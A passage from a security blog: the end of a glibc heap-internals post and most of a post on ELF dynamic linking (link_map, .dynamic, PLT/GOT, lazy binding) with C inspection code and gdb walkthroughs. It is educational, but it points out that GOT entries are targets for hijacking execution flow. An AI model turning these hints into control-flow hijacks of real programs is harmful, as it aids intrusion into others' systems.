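Here's the arithmetic behind <span style="font-family: Courier New, Courier, monospace;">0x211</span> as a small sketch using the two size fields quoted above. The helper names are hypothetical; the flag values are glibc's, and (as far as I can tell from <span style="font-family: Courier New, Courier, monospace;">_int_free</span>) glibc sets PREV_INUSE on the merged chunk, since the chunk before it must be in use or it would have been merged too:<br />

```c
#include <assert.h>
#include <stddef.h>

/* Flag bits kept in the low bits of mchunk_size (values as in glibc). */
#define DEMO_PREV_INUSE     0x1
#define DEMO_IS_MMAPPED     0x2
#define DEMO_NON_MAIN_ARENA 0x4
#define DEMO_SIZE_BITS (DEMO_PREV_INUSE | DEMO_IS_MMAPPED | DEMO_NON_MAIN_ARENA)

/* Chunk size with the flag bits masked off (like glibc's chunksize()). */
size_t demo_chunksize(size_t size_field)
{
    return size_field & ~(size_t)DEMO_SIZE_BITS;
}

int demo_prev_inuse(size_t size_field)
{
    return (size_field & DEMO_PREV_INUSE) != 0;
}

/* Size field of the chunk produced by merging a free chunk (lower) with the
   free chunk physically after it (upper). */
size_t demo_coalesce(size_t lower_field, size_t upper_field)
{
    /* The upper chunk's PREV_INUSE bit must be clear: the lower one is free. */
    assert(!demo_prev_inuse(upper_field));
    return (demo_chunksize(lower_field) + demo_chunksize(upper_field)) | DEMO_PREV_INUSE;
}
```

It also confirms the layout: <span style="font-family: Courier New, Courier, monospace;">0x6024a0 + 0xe0 = 0x602580</span>, so the 0xe0-byte chunk ends exactly where the 0x130-byte one begins.<br />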
<br />
This is pretty much all there is to coalescing really. And that's pretty much all I have for this post; I'll continue this series by moving on to fast-bins, large chunk management and potentially some heap redirection tricks. Stay tuned for the next one folks!<br />
<br />
<h2 style="text-align: left;">
References and Reading</h2>
<div>
<i>Check out the following to see some inspiration for this post and more awesome things to find out about how the heap works.</i><br />
<ol style="text-align: left;">
<li><a href="https://sourceware.org/glibc/wiki/MallocInternals">https://sourceware.org/glibc/wiki/MallocInternals</a></li>
<li><a href="http://phrack.org/issues/66/10.html">http://phrack.org/issues/66/10.html</a></li>
<li><a href="http://www.phrack.org/issues/68/13.html">http://www.phrack.org/issues/68/13.html</a></li>
<li><a href="https://github.com/shellphish/how2heap">https://github.com/shellphish/how2heap</a></li>
<li><a href="https://www.blackhat.com/presentations/bh-usa-07/Ferguson/Whitepaper/bh-usa-07-ferguson-WP.pdf">https://www.blackhat.com/presentations/bh-usa-07/Ferguson/Whitepaper/bh-usa-07-ferguson-WP.pdf</a></li>
<li>2007 BlackHat Vegas V82 Ferguson Understanding the Heap 00 - <a href="https://www.youtube.com/watch?v=VLnhV1T5Ng4">https://www.youtube.com/watch?v=VLnhV1T5Ng4</a> </li>
<li>The Heap: what does malloc() do? - (bin 0x14) - <a href="https://www.youtube.com/watch?v=ZHghwsTRyzQ">https://www.youtube.com/watch?v=ZHghwsTRyzQ</a> </li>
<li><a href="ftp://ftp.cs.utexas.edu/pub/garbage/allocsrv.ps">ftp://ftp.cs.utexas.edu/pub/garbage/allocsrv.ps</a> </li>
<li><a href="https://www.cs.tufts.edu/~nr/cs257/archive/paul-wilson/fragmentation.pdf">https://www.cs.tufts.edu/~nr/cs257/archive/paul-wilson/fragmentation.pdf</a> </li>
<li><a href="https://www.blackhat.com/docs/eu-17/materials/eu-17-Heelan-Heap-Layout-Optimisation-For-Exploitation-wp.pdf">https://www.blackhat.com/docs/eu-17/materials/eu-17-Heelan-Heap-Layout-Optimisation-For-Exploitation-wp.pdf</a> </li>
<li><a href="http://g.oswego.edu/dl/html/malloc.html">http://g.oswego.edu/dl/html/malloc.html</a></li>
<li><a href="https://fossies.org/linux/glibc/malloc/malloc.c">https://fossies.org/linux/glibc/malloc/malloc.c</a> </li>
</ol>
</div>
<div>
<br /></div>
<div>
<br /></div>
<br />
<br />
<br />
<br /></div>
Keith Makanhttp://www.blogger.com/profile/10220395050030522020noreply@blogger.com0tag:blogger.com,1999:blog-5845671313867906274.post-25589007033507894022018-11-09T01:08:00.002-08:002018-11-09T20:54:49.284-08:00Introduction to the ELF Format (Part VII): Dynamic Linking / Loading and the .dynamic section<div dir="ltr" style="text-align: left;" trbidi="on">
<div>
<br />
This post is part of a series on the ELF format; if you haven't checked out the other parts of the series, here they are:<br />
<ol style="text-align: left;">
<li>(Part I) : ELF Header <a href="https://blog.k3170makan.com/2018/09/introduction-to-elf-format-elf-header.html">https://blog.k3170makan.com/2018/09/introduction-to-elf-format-elf-header.html</a></li>
<li> (Part II) : Program Headers <a href="https://blog.k3170makan.com/2018/09/introduction-to-elf-format-part-ii.html">https://blog.k3170makan.com/2018/09/introduction-to-elf-format-part-ii.html </a></li>
<li>(Part III) : Section Header Table <a href="https://blog.k3170makan.com/2018/09/introduction-to-elf-file-format-part.html">https://blog.k3170makan.com/2018/09/introduction-to-elf-file-format-part.html </a></li>
</ol>
<div>
<i>and many more!</i></div>
<div>
<br /></div>
So in this one I'm going to talk a little bit about how dynamic linking works. I'll unpack some useful things to know about how functions are executed when dynamic linking/loading is in effect.<br />
<h2 style="text-align: left;">
Overview of dynamic linking</h2>
As you would imagine, there are a few ingredients to the dynamic linking magic, namely the procedure linkage table, the global offset table and the <span style="font-family: "courier new" , "courier" , monospace;">.dynamic</span> section. I'm going to lay out some basic GOT and PLT theory, and later on in the post I'll back up all this wonderful theory with some disassembled code and gdb screen dumps! So anyway, getting back into it...<br />
<br />
The Procedure Linkage Table (PLT) (<i>it's actually more like a list of code stubs</i>) is a rough landing area for function calls to hit as a first stop in their dynamic linking journey. The PLT either branches directly to the function definition it needs (<i>by referencing the relevant entry in the Global Offset Table</i>) or sets up a call to the runtime to sort it out (<i>along with some other parameters we will see later on!</i>). <i>A better name would be something like a "Procedure linkage function chain" because it's actually just a contiguous region of code with a little runtime-invoking stub at its "head".</i><br />
<br />
The Global Offset Table (GOT) holds values that are meant to point directly to the intended definition - <i>it's essentially the "final destination" of a function call</i>. As mentioned above, this table is used as a kind of de-coupled reference table for the PLT. This is amazing for exploit deve-uh I mean compiler extension development, because it means that if you can achieve a simple address-wide overwrite, you can do a lot by targeting the GOT in terms of controlling execution flow.<br />
<br />
The runtime's end goal is to replace the GOT entry for the called function with its correct value. The PLT entry that runs when a function is called prepares some arguments the runtime needs to resolve that particular GOT entry. These arguments include the <span style="font-family: "courier new" , "courier" , monospace;">link_map</span> for the given object and the index of the function's relocation entry, which in turn refers to the function's entry in the dynamic symbol table.<br />
<br />
So we're going to look at how each of these data structures works and show simply where you can replace values to subvert execution flow (depending on how you achieve the write of course).<br />
<br />
<h2 style="text-align: left;">
ELF Link Maps </h2>
<br />
As much as I wish this was literally a map of an elf named Link (breath of the wild reaccs only), link_maps are essentially small data structures that hold a couple of pointers to some meta-data needed for completing a dynamic linking action. They get shuffled around the internals of the runtime, the dynamic linker and other shared-object handling code. link_map structs are passed directly to the function that performs the dynamic linking action, <span style="font-family: "courier new" , "courier" , monospace;">_dl_runtime_resolve_*</span> <i>(there are some caveats to this depending on OS and arch I believe</i>). So they are actually more like little maps that link in the ELF symbol gods. Anyway, here's what they look like:<br />
extract from elf/link.h:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcvGGf_zZSETWiijX0N_-ZYqmn08pwZNcZGQV1BMJC_CqYgvpv3gYL84H8Bo9RctGVn4h-Z2sc5XkkFFBQQ56Rztyz5Z0hjQoDuWe09fE76Jzd1aRfdguk43lGWiZ_yTvqYpdPMpOYHvg/s1600/Screenshot+from+2018-11-08+20-16-43.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="338" data-original-width="1170" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcvGGf_zZSETWiijX0N_-ZYqmn08pwZNcZGQV1BMJC_CqYgvpv3gYL84H8Bo9RctGVn4h-Z2sc5XkkFFBQQ56Rztyz5Z0hjQoDuWe09fE76Jzd1aRfdguk43lGWiZ_yTvqYpdPMpOYHvg/s1600/Screenshot+from+2018-11-08+20-16-43.png" /></a></div>
<br />
<br />
The fields are documented pretty well, and as far as I can see they really do behave as described.<br />
We can, though, confirm some of these details through some light data collection and debugging. Here's a demonstration of how the <span style="font-family: "courier new" , "courier" , monospace;">l_next</span> and <span style="font-family: "courier new" , "courier" , monospace;">l_prev</span> fields work:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSSmPpHtJW26bG9sR73spOtkT0eC8S4p0VMqIE-3z4aYuC2scW1CcoLuOT7n5mxcryrvgtg0CoyqOtkT7sfdyYPnhtBJVzxKVKxBtWsSima4MejSf60c_TSdIhn_w5lEd_mWIgTH5oljM/s1600/l_next-prev.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="517" data-original-width="1045" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSSmPpHtJW26bG9sR73spOtkT0eC8S4p0VMqIE-3z4aYuC2scW1CcoLuOT7n5mxcryrvgtg0CoyqOtkT7sfdyYPnhtBJVzxKVKxBtWsSima4MejSf60c_TSdIhn_w5lEd_mWIgTH5oljM/s1600/l_next-prev.png" /></a></div>
<br />
<br />
So essentially the public part of each <span style="font-family: "courier new" , "courier" , monospace;">link_map</span> ends its record with these values: they contain the addresses for finding the next and the previous element in the list. <i>I don't see anything just yet, but I'm looking out for things that make use of the l_next and l_prev elements in a turing completey way ;) </i><br />
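If you'd rather walk this list from C than from gdb, <span style="font-family: "courier new" , "courier" , monospace;">dl_iterate_phdr()</span> (declared in link.h) visits each loaded object. In glibc it's implemented by following the link_map chain through <span style="font-family: "courier new" , "courier" , monospace;">l_next</span>, handing you <span style="font-family: "courier new" , "courier" , monospace;">l_addr</span> as <span style="font-family: "courier new" , "courier" , monospace;">dlpi_addr</span> and <span style="font-family: "courier new" , "courier" , monospace;">l_name</span> as <span style="font-family: "courier new" , "courier" , monospace;">dlpi_name</span>. A minimal sketch (the helper names are my own):<br />

```c
#define _GNU_SOURCE
#include <assert.h>
#include <link.h>
#include <stdio.h>

/* Called once per loaded object; in glibc this follows the link_map chain. */
static int demo_print_object(struct dl_phdr_info *info, size_t size, void *data)
{
    int *count = data;
    (void)size;
    /* dlpi_addr corresponds to l_addr and dlpi_name to l_name;
       the main program usually has an empty name. */
    const char *name = (info->dlpi_name && info->dlpi_name[0]) ? info->dlpi_name
                                                               : "(main program)";
    printf("%2d  l_addr=%#lx  %s\n", *count, (unsigned long)info->dlpi_addr, name);
    (*count)++;
    return 0; /* zero means keep iterating */
}

/* Print every loaded object and return how many there were. */
int demo_list_loaded_objects(void)
{
    int count = 0;
    dl_iterate_phdr(demo_print_object, &count);
    assert(count >= 1); /* the main program is always reported */
    return count;
}
```

Calling <span style="font-family: "courier new" , "courier" , monospace;">demo_list_loaded_objects()</span> from a dynamically linked program should list the program itself followed by its shared objects (vdso, libc, the dynamic linker and so on).<br />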
<br />
There is one other field I would like to expand on here, namely <span style="font-family: "courier new" , "courier" , monospace;">l_ld</span>: this is a pointer to the <span style="font-family: "courier new" , "courier" , monospace;">.dynamic</span> section of the object the link_map describes. And as you guessed, it means we will probably need to talk about how the <span style="font-family: "courier new" , "courier" , monospace;">.dynamic</span> section works.<br />
<h2>
<span style="font-family: inherit;">The .dynamic section</span></h2>
<br />
The dynamic section essentially holds a number of arguments that inform and influence parts of the dynamic linker's behavior. This is because, as a component of the runtime, the dynamic linker does much more than relocate functions; it also runs housekeeping functions like INIT and FINI. Here's what the entries of the dynamic section look like according to glibc:<br />
extract from elf/elf.h:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_4yEYF4zGRhlttkYISFO7sKEYDKqvy5jJnc-c_DikqTNnPntc_nYRjgEIfTzPhpF5Z0bBj6V5UUG52G2JBplb21HfzW6A05RHrS_GnAe6OAvfqc8kLUig09-hRj3dFHzAVZPBxHV_yac/s1600/Screenshot+from+2018-11-08+21-44-24.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="909" data-original-width="1022" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_4yEYF4zGRhlttkYISFO7sKEYDKqvy5jJnc-c_DikqTNnPntc_nYRjgEIfTzPhpF5Z0bBj6V5UUG52G2JBplb21HfzW6A05RHrS_GnAe6OAvfqc8kLUig09-hRj3dFHzAVZPBxHV_yac/s1600/Screenshot+from+2018-11-08+21-44-24.png" /></a></div>
<br />
<br />
Each entry is simply a pair of address-sized values: one indicating the type of dynamic section entry (<span style="font-family: "courier new" , "courier" , monospace;">d_tag</span>) and one holding the actual value of the entry (<span style="font-family: "courier new" , "courier" , monospace;">d_un</span>). <span style="font-family: "courier new" , "courier" , monospace;">d_un</span> is a union because, depending on the tag, the value is either an integer (<span style="font-family: "courier new" , "courier" , monospace;">d_val</span>, e.g. a size or a string-table offset) or an address (<span style="font-family: "courier new" , "courier" , monospace;">d_ptr</span>). Take a look at this hexdump example to see how the values can vary for the <span style="font-family: "courier new" , "courier" , monospace;">d_un</span> field:<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxgBnpckG874WcSF0JxI4_6JFctfESQVClXbiSnM_66TT5hmr7_l14WiFwFu8OgvIwW5COGqsUuZ59nzun3pea9A4cKEe9OtQNvisOa5y6ul-bgDclp-dWiPDZ5hsPKj7WR9MCfVnEgQA/s1600/dynamic+section+%25281%2529.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="443" data-original-width="1041" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxgBnpckG874WcSF0JxI4_6JFctfESQVClXbiSnM_66TT5hmr7_l14WiFwFu8OgvIwW5COGqsUuZ59nzun3pea9A4cKEe9OtQNvisOa5y6ul-bgDclp-dWiPDZ5hsPKj7WR9MCfVnEgQA/s1600/dynamic+section+%25281%2529.png" /></a></div>
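You can also dump these (d_tag, d_un) pairs from inside a running program. The sketch below uses <span style="font-family: "courier new" , "courier" , monospace;">dl_iterate_phdr()</span>, whose first reported object is the main program, finds its PT_DYNAMIC segment and walks entries until DT_NULL. The helper names are hypothetical, and note the loader may already have adjusted some <span style="font-family: "courier new" , "courier" , monospace;">d_ptr</span> values in memory, so addresses can differ from what a static hexdump shows:<br />

```c
#define _GNU_SOURCE
#include <assert.h>
#include <elf.h>
#include <link.h>
#include <stdio.h>

/* dl_iterate_phdr callback: print the main program's .dynamic entries. */
static int demo_dump_dynamic(struct dl_phdr_info *info, size_t size, void *data)
{
    int *entries = data;
    (void)size;
    assert(info->dlpi_phdr != NULL);

    for (int i = 0; i < info->dlpi_phnum; i++) {
        const ElfW(Phdr) *ph = &info->dlpi_phdr[i];
        if (ph->p_type != PT_DYNAMIC)
            continue;

        /* p_vaddr is a link-time address; add the load bias (dlpi_addr). */
        const ElfW(Dyn) *dyn = (const ElfW(Dyn) *)(info->dlpi_addr + ph->p_vaddr);
        size_t max = ph->p_memsz / sizeof(ElfW(Dyn));

        /* Each entry is a (d_tag, d_un) pair; DT_NULL ends the list. */
        for (size_t j = 0; j < max && dyn[j].d_tag != DT_NULL; j++) {
            /* d_un is a union: d_val (integer) or d_ptr (address). */
            printf("d_tag=%#lx  d_un=%#lx\n",
                   (unsigned long)dyn[j].d_tag, (unsigned long)dyn[j].d_un.d_val);
            (*entries)++;
        }
    }
    return 1; /* non-zero stops iteration after the first object (main program) */
}

/* Number of non-DT_NULL entries in the main program's .dynamic
   (0 if it has no PT_DYNAMIC, e.g. a static non-PIE binary). */
int demo_count_main_dynamic_entries(void)
{
    int entries = 0;
    dl_iterate_phdr(demo_dump_dynamic, &entries);
    return entries;
}
```

The tags printed should line up with what <span style="font-family: "courier new" , "courier" , monospace;">readelf -d</span> reports for the same binary.<br />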
<br />
<br />
Okay, so that's the <span style="font-family: "courier new" , "courier" , monospace;">link_map</span> and <span style="font-family: "courier new" , "courier" , monospace;">.dynamic</span> section done; we can move on to looking at what happens when a function is resolved and how this affects the GOT.<br />
<br />
<h2 style="text-align: left;">
Runtime lazy loading up close</h2>
<br />
To get functions resolved without preparing all the relocations up front, the ELF format and dynamic linker use a mechanism called lazy loading (also known as lazy binding). Lazy loading means resolving and patching up the GOT entry for a function when it is first called, so that subsequent calls do not need to involve the dynamic linker / runtime (<i>in a previous post I showed explicitly how the dynamic linker kicks in again if you mess with some other meta-data</i>).<br />
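Here's a toy model of that "patch on first call" behaviour in plain C. Function pointers stand in for GOT slots, and a stub stands in for the PLT entry plus the runtime resolver. It's only an illustration under those assumptions, not how ld.so is implemented, and all names are hypothetical:<br />

```c
#include <assert.h>
#include <stddef.h>

typedef int (*demo_fn)(int);

/* The "library function" we eventually want to reach. */
static int demo_real_double(int x) { return 2 * x; }

/* How many times we "entered the dynamic linker". */
static int demo_resolver_calls = 0;

static int demo_lazy_stub_0(int x);

/* GOT slot 0 starts out pointing at the stub, like an unresolved GOT entry
   pointing back into the PLT. */
static demo_fn demo_got[1] = { demo_lazy_stub_0 };

/* Stub for slot 0: "resolve" the symbol, patch the slot, forward the call. */
static int demo_lazy_stub_0(int x)
{
    demo_resolver_calls++;
    demo_got[0] = demo_real_double;   /* later calls skip the stub */
    return demo_got[0](x);
}

/* A call site always jumps through the slot, like a PLT entry does. */
int demo_call_slot0(int x)
{
    assert(demo_got[0] != NULL);
    return demo_got[0](x);
}
```

The first <span style="font-family: "courier new" , "courier" , monospace;">demo_call_slot0(21)</span> goes through the stub and returns 42; every later call jumps straight to <span style="font-family: "courier new" , "courier" , monospace;">demo_real_double</span>, and the resolver counter stays at 1.<br />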
<br />
Okay, so let's see if all this cool theory holds in practice. How are we going to see what the runtime does with the GOT? Here's a simple methodology:<br />
<ol style="text-align: left;">
<li>Find a pointer to the top of the PLT (<i>I will also cover some structuring of the PLT to show you where the "top" is</i>)</li>
<li>Once we have the PLT we can find two things: 1) the GOT entry for the function being called and 2) a place to set a break point before the GOT is edited (<i>namely the entry point of the runtime</i>)</li>
<li>Set a break point on the function </li>
<li>Compare the GOT values before and after. </li>
</ol>
<div>
<br /></div>
<div>
First step is to find a pointer to the top of the PLT; let's take a look at an annotated dump of a binary's <span style="font-family: "courier new" , "courier" , monospace;">_start </span>and PLT sections (<i>I disassembled _start because in order to call __libc_start_main it needs to involve the PLT as well</i>):</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqoDU7vjOMYq5FY322tVPtXm2zsBvY2FWqC3GAJ-zD9e-HEBqOQdnAN5GTtdgVRYp1YWHuxa2LncbH3f09tz0ZERZJPo8FvQLdkmc3qWojIQ-yXPP7gX2KPiDxn080pB5jgGNEe4e2iXY/s1600/PLT%252BGOT+%25281%2529.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="741" data-original-width="1155" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqoDU7vjOMYq5FY322tVPtXm2zsBvY2FWqC3GAJ-zD9e-HEBqOQdnAN5GTtdgVRYp1YWHuxa2LncbH3f09tz0ZERZJPo8FvQLdkmc3qWojIQ-yXPP7gX2KPiDxn080pB5jgGNEe4e2iXY/s1600/PLT%252BGOT+%25281%2529.png" /></a></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
So we can see from the picture that at instruction <span style="font-family: "courier new" , "courier" , monospace;">0x400534</span> a call to the PLT entry of <span style="font-family: "courier new" , "courier" , monospace;">__libc_start_main</span> is made. This then ends up doing a couple things:</div>
<div>
<ol style="text-align: left;">
<li><span style="font-family: "courier new" , "courier" , monospace;">0x4004e0</span>: jump through <span style="font-family: "courier new" , "courier" , monospace;">0x601030</span>, the GOT entry for <span style="font-family: "courier new" , "courier" , monospace;">__libc_start_main</span>. This is how lazy loading works: if the GOT entry has already been patched, this jump lands directly in the function, but on the first call the GOT entry still holds the address of the next instruction in this PLT entry, so the jump effectively just moves on to the next position in the PLT.</li>
<li><span style="font-family: "courier new" , "courier" , monospace;">0x4004e6</span>: push a number onto the stack. This is the index of the relocation entry that applies to this call; the dynamic linker needs it to do its job.</li>
<li><span style="font-family: "courier new" , "courier" , monospace;">0x4004eb</span>: jump to the head of the PLT, which invokes the dynamic linker.</li>
</ol>
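<div>
To make those three steps concrete, here is a toy C model of lazy binding. It is only a sketch under stated assumptions: the real PLT is a handful of machine instructions and the real resolver is glibc's <span style="font-family: "courier new" , "courier" , monospace;">_dl_runtime_resolve</span>, whereas here plain function pointers stand in for GOT slots. All the names (<span style="font-family: "courier new" , "courier" , monospace;">real_double</span>, <span style="font-family: "courier new" , "courier" , monospace;">stub_double</span>, <span style="font-family: "courier new" , "courier" , monospace;">resolve_and_call</span> and so on) are hypothetical.</div>

```c
#include <assert.h>
#include <stddef.h>

/* Toy model of lazy binding (NOT the real PLT): each "GOT" slot is a function
 * pointer that starts out pointing at a stub, the way an unresolved GOT entry
 * points back into its own PLT entry. */
typedef int (*fn_t)(int);

static int real_double(int x) { return 2 * x; }   /* hypothetical "library" functions */
static int real_negate(int x) { return -x; }

static fn_t got[2];              /* toy GOT */
static int resolver_calls;       /* how often we entered the "dynamic linker" */

/* Stand-in for the symbol lookup the dynamic linker does for a reloc index. */
static fn_t lookup_target(size_t reloc_index) {
    static const fn_t targets[] = { real_double, real_negate };
    assert(reloc_index < sizeof targets / sizeof targets[0]);
    return targets[reloc_index];
}

/* Plays PLT0 + _dl_runtime_resolve: resolve, patch the GOT slot, then
 * forward the original call to the real function. */
static int resolve_and_call(size_t reloc_index, int arg) {
    resolver_calls++;
    got[reloc_index] = lookup_target(reloc_index);
    return got[reloc_index](arg);
}

/* What "push <reloc index>; jmp PLT0" amounts to for each entry. */
static int stub_double(int x) { return resolve_and_call(0, x); }
static int stub_negate(int x) { return resolve_and_call(1, x); }

static void init_got(void) {
    got[0] = stub_double;
    got[1] = stub_negate;
    resolver_calls = 0;
}

/* Every call site goes through the GOT, like the "jmp *GOT[n]" in a PLT entry. */
static int call_via_plt(size_t n, int arg) { return got[n](arg); }
```

<div>
After <span style="font-family: "courier new" , "courier" , monospace;">init_got()</span>, <span style="font-family: "courier new" , "courier" , monospace;">call_via_plt(0, 21)</span> returns 42 and bumps <span style="font-family: "courier new" , "courier" , monospace;">resolver_calls</span> to 1; a second <span style="font-family: "courier new" , "courier" , monospace;">call_via_plt(0, 5)</span> returns 10 without entering the resolver, because <span style="font-family: "courier new" , "courier" , monospace;">got[0]</span> now points straight at <span style="font-family: "courier new" , "courier" , monospace;">real_double</span>.</div>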
<div>
Okay, let's see what the PLT looks like in its full glory:</div>
</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjg5SxV0v5tPQCOrnXYrYFP4ODRULnL6e3m3HC4j1KJgHSiPhTmxHopTi-_4dxyin3nAq2LlNmY_qVFXzC_SawSrGMPPCBSnnQN1rdAebmMhoEfYTWc1EEFb7gvCFV3dOIC4xTVx63kEtg/s1600/PLT+disection.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="504" data-original-width="1060" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjg5SxV0v5tPQCOrnXYrYFP4ODRULnL6e3m3HC4j1KJgHSiPhTmxHopTi-_4dxyin3nAq2LlNmY_qVFXzC_SawSrGMPPCBSnnQN1rdAebmMhoEfYTWc1EEFb7gvCFV3dOIC4xTVx63kEtg/s1600/PLT+disection.png" /></a></div>
<div>
<br /></div>
And so we can see a pattern forming in the PLT: every entry has these base elements:<br />
<ul style="text-align: left;">
<li>jump to the GOT</li>
<li>push reloc index</li>
<li>jump to the PLT head (<span style="font-family: "courier new" , "courier" , monospace;">_dl_runtime_resolve</span>*)</li>
</ul>
<div>
The head contains some interesting code. We can see at instruction <span style="font-family: "courier new" , "courier" , monospace;">0x4004a0</span> that some value gets pushed onto the stack before the head jumps off to <span style="font-family: "courier new" , "courier" , monospace;">_dl_runtime_resolve</span> at instruction <span style="font-family: "courier new" , "courier" , monospace;">0x4004a6</span>. What's happening here is that the <span style="font-family: "courier new" , "courier" , monospace;">link_map</span> of the object that owns this PLT and GOT (<i>the executable itself here; libc.so, libsecurity etc. each have their own PLT, GOT and link_map</i>) is being passed to the <span style="font-family: "courier new" , "courier" , monospace;">_dl_runtime_resolve</span> function as an argument, next to the relocation index pushed by the PLT entry. The resolver then uses that link_map and index to find the relocation and look up the symbol.<br />
<br />
We can dissect this value across different calls to <span style="font-family: "courier new" , "courier" , monospace;">_dl_runtime_resolve</span> to see that it is always the same link_map object. A link_map must contain a pointer into the object's dynamic section (<i>its <span style="font-family: "courier new" , "courier" , monospace;">l_ld</span> field</i>), so if we see values resembling dynamic section addresses in the area around the pointer being passed to <span style="font-family: "courier new" , "courier" , monospace;">_dl_runtime_resolve</span>, it is most likely a link_map object. Or I should rather say: <i>whatever appears there, <span style="font-family: "courier new" , "courier" , monospace;">_dl_runtime_resolve</span> will treat it like a <span style="font-family: "courier new" , "courier" , monospace;">link_map</span> object</i>.<br />
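<div>
If you'd rather poke at link_map objects from C than from a debugger, the dynamic linker publishes its <span style="font-family: "courier new" , "courier" , monospace;">struct r_debug</span> (whose <span style="font-family: "courier new" , "courier" , monospace;">r_map</span> heads the link_map list) through the executable's <span style="font-family: "courier new" , "courier" , monospace;">DT_DEBUG</span> dynamic entry, the same hook debuggers use. This sketch assumes glibc's <span style="font-family: "courier new" , "courier" , monospace;">link.h</span> and a dynamically linked executable built with GNU ld (which defines <span style="font-family: "courier new" , "courier" , monospace;">_DYNAMIC</span>); <span style="font-family: "courier new" , "courier" , monospace;">find_r_debug</span>, <span style="font-family: "courier new" , "courier" , monospace;">dump_link_maps</span> and <span style="font-family: "courier new" , "courier" , monospace;">main_map_l_ld_ok</span> are hypothetical helpers. It checks the property described above: the main program's link_map has <span style="font-family: "courier new" , "courier" , monospace;">l_ld</span> pointing at its own dynamic section.</div>

```c
#include <assert.h>
#include <elf.h>
#include <link.h>     /* struct link_map, struct r_debug, ElfW() */
#include <stddef.h>
#include <stdio.h>

/* Defined by the linker: the start of this executable's .dynamic section. */
extern ElfW(Dyn) _DYNAMIC[];

/* ld.so stores the address of its struct r_debug in DT_DEBUG at startup. */
static struct r_debug *find_r_debug(void) {
    for (ElfW(Dyn) *d = _DYNAMIC; d->d_tag != DT_NULL; d++)
        if (d->d_tag == DT_DEBUG)
            return (struct r_debug *)d->d_un.d_ptr;
    return NULL;
}

/* Print name, load bias (l_addr) and .dynamic pointer (l_ld) for every loaded
 * object; returns how many link_map objects were visited. */
static size_t dump_link_maps(const struct r_debug *r, FILE *out) {
    size_t n = 0;
    assert(r != NULL);
    for (const struct link_map *lm = r->r_map; lm != NULL; lm = lm->l_next, n++)
        fprintf(out, "%-45s l_addr=%#lx l_ld=%p\n",
                lm->l_name[0] != '\0' ? lm->l_name : "(main program)",
                (unsigned long)lm->l_addr, (void *)lm->l_ld);
    return n;
}

/* The first link_map is the main program; its l_ld should equal _DYNAMIC. */
static int main_map_l_ld_ok(const struct r_debug *r) {
    return r != NULL && r->r_map != NULL && r->r_map->l_ld == _DYNAMIC;
}
```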
<br />
So let's see what these values look like as they fly into the resolve call:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhScRDT8QK_th2zfZsSv8SLeR0xgVcPMW5c5E_eMOF4lp6B3ZuTNn9hNnks5T3SwI09__mRJzOr4ZPenP7DlAk0qF5B1z2suY1AtQiT3Qm1qwoP45_2lmxrmWAqqRlMAykeh1H6BJruMA4/s1600/link_map.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="724" data-original-width="1175" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhScRDT8QK_th2zfZsSv8SLeR0xgVcPMW5c5E_eMOF4lp6B3ZuTNn9hNnks5T3SwI09__mRJzOr4ZPenP7DlAk0qF5B1z2suY1AtQiT3Qm1qwoP45_2lmxrmWAqqRlMAykeh1H6BJruMA4/s1600/link_map.png" /></a></div>
<br />
I can also show that the GOT does in fact get patched with new values as the runtime gets called. Here's a screenshot showing this for the resolution of puts:</div>
<div>
<br /></div>
<div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqWfl4AVLvGO6lMoD8W8xdbN03ue9O1fF_fYDdP3PUsYoG6e3O2sPY1vho7tufua6dTP8qIK84q0JpckoB6zYhLZLMrpaPR5Rhpc4x2OVtuAZEy0Io693jqDlgnw05PSe2MCjvYjLfD5I/s1600/puts_GOT.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="728" data-original-width="970" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqWfl4AVLvGO6lMoD8W8xdbN03ue9O1fF_fYDdP3PUsYoG6e3O2sPY1vho7tufua6dTP8qIK84q0JpckoB6zYhLZLMrpaPR5Rhpc4x2OVtuAZEy0Io693jqDlgnw05PSe2MCjvYjLfD5I/s1600/puts_GOT.png" /></a></div>
<br /></div>
<div>
